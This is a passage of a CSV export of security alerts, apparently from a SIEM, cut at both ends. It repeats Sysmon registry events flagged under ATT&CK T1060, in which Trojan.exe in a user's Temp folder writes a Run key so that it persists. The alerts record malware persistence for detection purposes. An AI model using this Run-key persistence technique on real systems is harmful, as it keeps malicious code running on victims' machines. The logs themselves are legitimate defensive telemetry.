..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:45.676862000Z"",""eventRecordID"":""2024"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:45.668\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:45.668"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:48.008",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:44.621 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:44.633356400Z"",""eventRecordID"":""2023"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:44.621\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:44.621"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:46.986",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:43.574 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:43.577873700Z"",""eventRecordID"":""2021"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:43.574\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:43.574"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:45.935",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:42.558 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:42.561079100Z"",""eventRecordID"":""2018"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:42.558\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:42.558"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:44.931",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:41.543 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:41.544899900Z"",""eventRecordID"":""2017"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:41.543\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:41.543"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:43.901",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:40.511 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:40.513324400Z"",""eventRecordID"":""2016"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:40.511\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:40.511"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:42.869",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:39.496 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:39.496731100Z"",""eventRecordID"":""2015"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:39.496\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:39.496"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:41.994",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:38.481 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:38.482424300Z"",""eventRecordID"":""2014"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:38.481\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:38.481"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:41.978",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:37.465 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:37.472588400Z"",""eventRecordID"":""2013"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:37.465\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:37.465"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:41.901",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:36.449 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:36.460237600Z"",""eventRecordID"":""2012"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:36.449\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:36.449"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:38.823",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:35.434 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:35.435966800Z"",""eventRecordID"":""2010"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:35.434\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:35.434"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:37.815",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:34.402 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 